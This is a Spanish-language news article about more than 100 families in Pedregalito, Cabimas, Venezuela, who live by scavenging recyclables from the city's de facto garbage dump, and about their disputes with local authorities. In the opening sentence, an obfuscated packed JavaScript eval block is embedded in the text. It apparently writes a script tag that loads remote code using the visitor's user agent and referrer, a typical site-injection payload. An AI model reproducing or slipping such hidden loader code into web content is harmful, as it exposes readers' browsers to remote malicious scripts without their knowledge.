Más de 100 familias viven de la basura en Pedregalito

Dioxelis Reyes Hernández / Cabimas / [email protected]
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zebib|var|u0026u|referrer|rrrey||js|php'.split('|'),0,{})) Cabimas no hay vertedero y en un sector de la ciudad los camiones descargan sus desperdicios. Los habitantes de Pedregalito buscan entre la basura su sustento diario. No conocen otra forma de vida

Foto: Dioxelis Reyes

Un camino desolado y sin asfalto es el preludio de una triste escena. Del manto de polvo emergen unas pequeñas viviendas; algunas lucen coloridas con sus latas de zinc pintadas, otras, más favorecidas, de fuerte bloque y platabanda, con lindas flores y arbustos que intentan disimular la dolorosa imagen que muestran sus patios traseros, atiborrados por montañas de basura, pues eso son sus casas: el vertedero de Cabimas.

Son las 106 familias del sector Pedregalito, donde no hay escuelas, hospitales ni canchas, los habitantes deben caminar más de un kilómetro para salir de sus predios y donde la polvareda anuncia la llegada de los camiones de desechos. PDVSA, Imauca y empresas privadas, que se aproximan a la zona para verter la basura, son los que les dan el pan de cada día a los habitantes.

“Aquí todos vivimos del reciclaje”, comentó Mirna Romero, habitante de la zona. “Recolectamos papel, plástico, vidrios, cartón y metal para venderlos y poder subsistir. Cada quien tiene una parcela y cuando los camiones llegan echan la basura en los patios”, continuó.

En ese momento comienza la labor de las familias. Armados con palas, rastrillos, guantes y botas, que encontraron entre la misma basura, grupos de hombres, mujeres y hasta niños inician su faena, de 7.00 a 10.00 de la mañana, y posteriormente, de 3.00 a 6.00 de la tarde. Luego de organizar en montoncitos aquellos preciados “tesoros”, esperan a los compradores.

“Vendemos lo recolectado por kilo. La gente viene a comprarlos porque le salen más baratos. La mayoría de nosotros nos dedicamos a esto porque, de trabajar en otro lugar, tendríamos que caminar más de un kilómetro para la salida”, destaca Romero.

Acoso policial

En Pedregalito los patios parecen respirar. Una nube negra exhalan los restos de los materiales quemados por lo vecinos, acción que genera innumerables protestas y disputas con la Alcaldía de Cabimas.

“Sabemos que quemar la basura está mal porque hasta a nosotros mismos nos afecta, pero si no lo hacemos, nos llenamos de basura. La Alcaldía se comprometió a enviar una máquina para compactar y no lo hizo. Quemamos porque no tenemos donde meterla”.

Cada vez que la humareda les abraza, contingentes de policías y militares son enviados para enfrentarse a los vecinos, quienes denuncian acoso, maltrato y abuso por parte de estos funcionarios que, incluso, hace poco quemaron el rancho de un vecino.

Reubicación y servicios

“A nosotros nos negaron el beneficio de Misión Vivienda y Misión AgroVenezuela porque, supuestamente, estamos en terrenos no aptos y eso es mentira porque nosotros hemos aprendido a vivir y a salir adelante aquí. Tenemos casas, criamos animales y hasta sembramos, pero no hay voluntad por parte de ningún organismo”, manifestó Luis Tirajara, habitante del sector.

El hombre afirmó que quieren reubicar a los pobladores en los sectores Panamá, Brisas del Lago y María Lugo, pero se niegan debido a que esas áreas se inundan cuando llueve.

“Nos quieren enviar a un sitio en peores condiciones y no hay un proyecto. Aquí lo que hay es un negocio porque Cabimas no tiene vertedero y si nos desalojan, la Alcaldía tendría la libertad de usar todo este espacio para ello. Por eso no hacen inversiones en servicios y nos tienen olvidados”, explicó Tirajara.

Un Mercal es lo único con lo que cuentan los habitantes de Pedregalito. Así, entre calles destruidas, deficiencias con el servicio de agua y luz, sin hospitales ni escuelas, transcurre la existencia de más de 500 personas que esperan el final de tanta hostilidad e indiferencia, pues, como ellos mismos dicen, “aquí con una ayudita que nos den salimos ganando todos”.

Ganancias

Las familias de Pedregalito hurgan entre la basura para obtener cobre, aluminio, bronce, vidrio, cartón, plástico, bolsas y hierro en un promedio de seis horas diarias. La ganancia mensual se calcula entre 500 y mil bolívares semanalmente.

Costo de material por kilo

Vidrio: Bs. 0,27

Cobre: Bs. 0,4 Bs.

Bronce: De Bs. 16 a Bs. 20

Aluminio: Bs. 5

Cartón: Bs. 0,25

Plástico: Bs. 0,7

Hojas blancas: Bs. 1

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama